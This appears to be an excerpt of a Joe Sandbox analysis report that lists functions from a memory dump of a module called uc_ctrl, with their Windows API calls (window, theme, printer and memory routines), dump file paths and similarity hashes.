Instruction Fuzzy Hash: 1D310571A45608BFEB159F29DC09EDEBB7CFF0A725F004211FB04A6A98D7B1DC1096A0

Function 6CC43ADE Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CC43AE5
IsAppThemed.UXTHEME(00000000,00000000,00000038,6CC43C36,?,?,?,?,?,?,6CB9084F,?,000000FF), ref: 6CC43B08
OpenThemeData.UXTHEME(?,Button,?,?,?,?,?,?,6CB9084F,?,000000FF), ref: 6CC43B2A
GetThemePartSize.UXTHEME(00000000,?,00000003,00000005,00000000,00000001,?,00000000,?,?,?,?,?,?,?,6CB9084F), ref: 6CC43B6C
CloseThemeData.UXTHEME(00000000,00000000,?,?,?,?,?,?,6CB9084F,?), ref: 6CC43B8B
GetObjectW.GDI32(00000006,00000018,?), ref: 6CC43BB7

Strings

Button, xrefs: 6CC43B24

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Theme$Data$CloseH_prolog3ObjectOpenPartSizeThemed
String ID: Button
API String ID: 1633685699-1034594571
Opcode ID: dcc4aa29c6e51564788f669e734a65260de1fd5680650415c7debd422785662c
Instruction ID: c95589cc0b72798734217a478e1e3e98de7678c35a6bc872616b23ede819a132
Opcode Fuzzy Hash: dcc4aa29c6e51564788f669e734a65260de1fd5680650415c7debd422785662c
Instruction Fuzzy Hash: 47315271B412059BEB14CFA5C859FEEBBB4AF45704F148019E515EB780EB70D9048B60

Function 6CB4460B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB44615

Part of subcall function 6CB44C70: SendMessageW.USER32(?,00000031,00000000,00000000), ref: 6CB44C79

SendMessageW.USER32(?,00000030,?,00000001), ref: 6CB4467B
SendMessageW.USER32(?,000000D4,00000000,00000000), ref: 6CB4468C
SendMessageW.USER32(?,00000030,?,00000001), ref: 6CB446B4
SendMessageW.USER32(?,000000D4,00000000,00000000), ref: 6CB446C0
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CB446E0

Strings

d, xrefs: 6CB44637

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$ContextExternal$BaseBase::~Concurrency::details::H_prolog3_
String ID: d
API String ID: 1047725533-2564639436
Opcode ID: 4e5df2b66ec37fb469b5b2767f71a2c1e486ec63f3d62f7dca8448bcdab1dd15
Instruction ID: 8dcbef776e4b7a4b0198c9c8381a76dd8caef7bf7ac61b24fe5163768b072873
Opcode Fuzzy Hash: 4e5df2b66ec37fb469b5b2767f71a2c1e486ec63f3d62f7dca8448bcdab1dd15
Instruction Fuzzy Hash: 9C21C070A002589FDB118FA9CC48FEEBAB8FF42308F404159F545A72A4DB708A14DF60

Function 6CB54402 Relevance: 12.3, APIs: 8, Instructions: 299COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 6CB54467
GetWindowRect.USER32(?,?), ref: 6CB54474

Part of subcall function 6CB543D1: GetParent.USER32(?), ref: 6CB543E9

GetWindowRect.USER32(?,?), ref: 6CB544C0
IntersectRect.USER32(?,?,?), ref: 6CB544D2
PtInRect.USER32(?,?,?), ref: 6CB5454B
GetWindowRect.USER32(?,?), ref: 6CB54592
PtInRect.USER32(?,?,?), ref: 6CB545A2
GetWindowRect.USER32(?,?), ref: 6CB546F5

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Window$CursorIntersectParent
String ID:
API String ID: 1143452425-0
Opcode ID: d01e9bfb5a33696d9afe76bb29582372c4775957f19df19a59fc8f87c8c33410
Instruction ID: 2480f896d3913a6b52d3005ff5ce28c5087ed99a360da1cbe127d77c4897f678
Opcode Fuzzy Hash: d01e9bfb5a33696d9afe76bb29582372c4775957f19df19a59fc8f87c8c33410
Instruction Fuzzy Hash: 3BC1F071E0014AAFCF04DFE9D5849EEBBB5FF09300F61416AD415A7648EB30AA66CF51

Function 6CB50C7B Relevance: 12.2, APIs: 8, Instructions: 165windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6CB8836C: IsWindow.USER32(?), ref: 6CB88378

SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6CB50E23

Part of subcall function 6CB86D4D: GetClientRect.USER32(00000000,6CB50CBC), ref: 6CB86D7C
Part of subcall function 6CB86D4D: PtInRect.USER32(6CB50CBC,?,?), ref: 6CB86D96

ScreenToClient.USER32(00000000,?), ref: 6CB50D06
PtInRect.USER32(?,?,?), ref: 6CB50D16
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6CB50D42
GetParent.USER32(?), ref: 6CB50D6A
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6CB50DE1
GetFocus.USER32 ref: 6CB50DE7
SendMessageW.USER32(?,00000010,00000000,00000000), ref: 6CB50E44

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$Rect$Client$FocusParentScreenWindow
String ID:
API String ID: 4216724418-0
Opcode ID: ce3ec73495fc8095d4daab055f3f84aa067c1cdc2bd83818b147e96926040459
Instruction ID: a76199331ce9b0e64cf7cf8cb1792cb328c7555f1886cefdd22e0680030ae818
Opcode Fuzzy Hash: ce3ec73495fc8095d4daab055f3f84aa067c1cdc2bd83818b147e96926040459
Instruction Fuzzy Hash: 1751E031B01285ABDF059F64D854AAE7B79FF4530CFA40029ED05EBB90DB30EA25CB91

Function 6CB2AFE8 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6CB2B02C
BeginDeferWindowPos.USER32(00000008), ref: 6CB2B042
GetTopWindow.USER32(?), ref: 6CB2B054
GetDlgCtrlID.USER32(00000000), ref: 6CB2B05D
SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 6CB2B095
GetWindow.USER32(00000000,00000002), ref: 6CB2B09E
CopyRect.USER32(?,?), ref: 6CB2B0B9
EndDeferWindowPos.USER32(00000000), ref: 6CB2B145

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
String ID:
API String ID: 1228040700-0
Opcode ID: c5deecc7f9f0082611c9609e308b19ce07e38bd98a450b3755e7c8294897c4e8
Instruction ID: bb8d4d58ed945f9189f4ae1afd936be65d425a87a6357def2110580899e253cb
Opcode Fuzzy Hash: c5deecc7f9f0082611c9609e308b19ce07e38bd98a450b3755e7c8294897c4e8
Instruction Fuzzy Hash: 69513C72901648DFCF01CFA4C884AFEB7B8FF4A315F14405AE81AB7640DB79A944CB65

Function 6CB3D45B Relevance: 12.1, APIs: 8, Instructions: 116COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 6CB3D4B5
ClientToScreen.USER32(?,?), ref: 6CB3D4CE
PtInRect.USER32(?,?,?), ref: 6CB3D4DE
WindowFromPoint.USER32(?,?), ref: 6CB3D4F2
SetCapture.USER32(?), ref: 6CB3D558
ReleaseCapture.USER32 ref: 6CB3D5A2
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB3D5BD
UpdateWindow.USER32(?), ref: 6CB3D5C6

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$CaptureClientWindow$FromInvalidatePointReleaseScreenUpdate
String ID:
API String ID: 1999979895-0
Opcode ID: 1512f9535a8f7826b9791c91143ed2ffe507e9ca0e231aea393460e9035b11bd
Instruction ID: 48eebc3a911e98fb30deeee98e848f418c0bb28a6e802a39766fa4e4ac5799c6
Opcode Fuzzy Hash: 1512f9535a8f7826b9791c91143ed2ffe507e9ca0e231aea393460e9035b11bd
Instruction Fuzzy Hash: A641AB72A10755CFDB118F75D844BABBBF5FF45309F11552EE4AA82510EB30A944CF22

Function 6CB43C4B Relevance: 12.1, APIs: 8, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 6CB43C8D
InvalidateRect.USER32(?,00000000,00000001), ref: 6CB43CD0
TrackPopupMenu.USER32(?,00000180,?,?,00000000,?,00000000), ref: 6CB43D29
GetParent.USER32(?), ref: 6CB43D38
SendMessageW.USER32(?,00000111,?,?), ref: 6CB43D6A
InvalidateRect.USER32(?,00000000,00000001,00000000), ref: 6CB43D8A
UpdateWindow.USER32(?), ref: 6CB43D93
ReleaseCapture.USER32 ref: 6CB43DA2

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$InvalidateWindow$CaptureMenuMessageParentPopupReleaseSendTrackUpdate
String ID:
API String ID: 2465089168-0
Opcode ID: d84b1838eb9bf7f5b7e65d5ea57452da403c3245ae58ade0e0a66813fbd4c77e
Instruction ID: c9c2704dd42a28d076d178a4bef4457aa64797a835ced3e9598ef6a9bb4ffb38
Opcode Fuzzy Hash: d84b1838eb9bf7f5b7e65d5ea57452da403c3245ae58ade0e0a66813fbd4c77e
Instruction Fuzzy Hash: 4A414970B09656FFDB089F75C884AAAFBB9FF49304F14422DE51993650D7346820DF91

Function 6CB4AF76 Relevance: 12.1, APIs: 8, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4AF7D
SendMessageW.USER32(?,0000113E,00000000,?), ref: 6CB4AFBF
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 6CB4AFDF
SHGetDesktopFolder.SHELL32(?), ref: 6CB4AFFE
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB4B030
SendMessageW.USER32(?,00001115,00000000,?), ref: 6CB4B071
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 6CB4B07F
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6CB4B08F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MessageSend$DesktopFolderH_prolog3RedrawWindow
String ID:
API String ID: 1930222516-0
Opcode ID: 1f7a30587d7d5246396a89128aad2baecb18b073ac79c8a2c4717d47326a456c
Instruction ID: 83d4c9a2683188c131c2a382cd609aaf61877e38741695a0824f31f93fcb375b
Opcode Fuzzy Hash: 1f7a30587d7d5246396a89128aad2baecb18b073ac79c8a2c4717d47326a456c
Instruction Fuzzy Hash: 82416E71A00205ABDB14DFA4CC88E9FBB79FF09705F444124F605A7B54E7309915CBA5

Function 6CB223F3 Relevance: 12.1, APIs: 8, Instructions: 78COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 6CB22417
ClientToScreen.USER32(?,?), ref: 6CB22432
GetWindow.USER32(?,00000005), ref: 6CB2243B
GetDlgCtrlID.USER32(00000000), ref: 6CB2244B
GetWindowLongW.USER32(00000000,000000F0), ref: 6CB2245B
GetWindowRect.USER32(00000000,?), ref: 6CB22479
PtInRect.USER32(?,?,?), ref: 6CB22489
GetWindow.USER32(00000000,00000002), ref: 6CB22498

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
String ID:
API String ID: 151369081-0
Opcode ID: 7e0b0a2dde267c6fdb4475cbf2dfbfb079d79c36d2a165b498597783f3fd0635
Instruction ID: 16295ab3ba457814a8e524a5eab375426bcf35ec580777c0a43c86a2285abcbf
Opcode Fuzzy Hash: 7e0b0a2dde267c6fdb4475cbf2dfbfb079d79c36d2a165b498597783f3fd0635
Instruction Fuzzy Hash: 89213271A12619ABDF018FA9CD4D9AFBBB8FF0A324B544129F915E7240D738D9018B91

Function 6CB4FB37 Relevance: 12.1, APIs: 8, Instructions: 65COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000031), ref: 6CB4FB45
GetSystemMetrics.USER32(00000032), ref: 6CB4FB53
SetRectEmpty.USER32(?), ref: 6CB4FB66
EnumDisplayMonitors.USER32(00000000,00000000,6CB4F9CB,?,?,00000000,6CB4FAF8), ref: 6CB4FB76
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6CB4FB85
SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 6CB4FBB2
SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 6CB4FBC6
SystemParametersInfoW.USER32 ref: 6CB4FBEC

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: 005923037d48a555a00b5726842f91ceda7d6cf13e715deea624752045af2954
Instruction ID: 243e9bd089c39b6abb598ac7a5dd2d52a404081e13fb6fc32a53ee1ca893c1cb
Opcode Fuzzy Hash: 005923037d48a555a00b5726842f91ceda7d6cf13e715deea624752045af2954
Instruction Fuzzy Hash: 4E21C4B1302616BFEB058F718888AE7BFBCFB0A355F045629E559C7140D7B0A855CBA1

Function 6CB1AACA Relevance: 12.1, APIs: 8, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(00000000), ref: 6CB1AADE
lstrcmpW.KERNEL32(00000000,?), ref: 6CB1AAEF
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6CB1AB04
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6CB1AB24
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6CB1AB2C
GlobalLock.KERNEL32(00000000), ref: 6CB1AB36
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6CB1AB47
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6CB1AB5F

Part of subcall function 6CB2210F: GlobalFlags.KERNEL32(?), ref: 6CB2211C
Part of subcall function 6CB2210F: GlobalUnlock.KERNEL32(?,?,6CD5A734,?,6CB57A20,6CD5A734,6CC86178,?,?,6CB7FA72,6CB507E2,00000000), ref: 6CB2212A
Part of subcall function 6CB2210F: GlobalFree.KERNEL32(?), ref: 6CB22136

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: e69a2470d061ce09475900e637c760c828bf5c15576aaf4bd069c0f5185c0637
Instruction ID: 2b076c8853cc057e5ea7b0d568882475c8154086ced4d26d383a69988d87f20e
Opcode Fuzzy Hash: e69a2470d061ce09475900e637c760c828bf5c15576aaf4bd069c0f5185c0637
Instruction Fuzzy Hash: 111194B1501648BFEB125FA0CD49DABBFFDEF05749B000529F70581820DB71AE64EB20

Function 6CB20215 Relevance: 12.0, APIs: 8, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 6CB2021E
GlobalAlloc.KERNEL32(00002002,00000000), ref: 6CB20236
GlobalSize.KERNEL32(?), ref: 6CB20247
GlobalLock.KERNEL32(?), ref: 6CB20255
GlobalLock.KERNEL32(?), ref: 6CB2025E
GlobalSize.KERNEL32(?), ref: 6CB2026B
GlobalUnlock.KERNEL32(?), ref: 6CB2027C
GlobalUnlock.KERNEL32(?), ref: 6CB20285

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc
String ID:
API String ID: 2344174106-0
Opcode ID: 93b83facca2e7351c7511ac9c3992104e45b7f01b674dafd6333dccbbd167c15
Instruction ID: 55d995805221e287d7062bbab7324df95d5773a9bb22f31fa2c50359843249ee
Opcode Fuzzy Hash: 93b83facca2e7351c7511ac9c3992104e45b7f01b674dafd6333dccbbd167c15
Instruction Fuzzy Hash: 48017C75702394BBDB012FA5EC8CC6B7F7CEB0B6A17085125FE0997201DE758C058761

Function 6CB2DBAD Relevance: 12.0, APIs: 8, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 6CB2DBB3
GetSystemMetrics.USER32(0000000C), ref: 6CB2DBBE
GetSystemMetrics.USER32(00000002), ref: 6CB2DBC9
GetSystemMetrics.USER32(00000003), ref: 6CB2DBD7
GetDC.USER32(00000000), ref: 6CB2DBE5
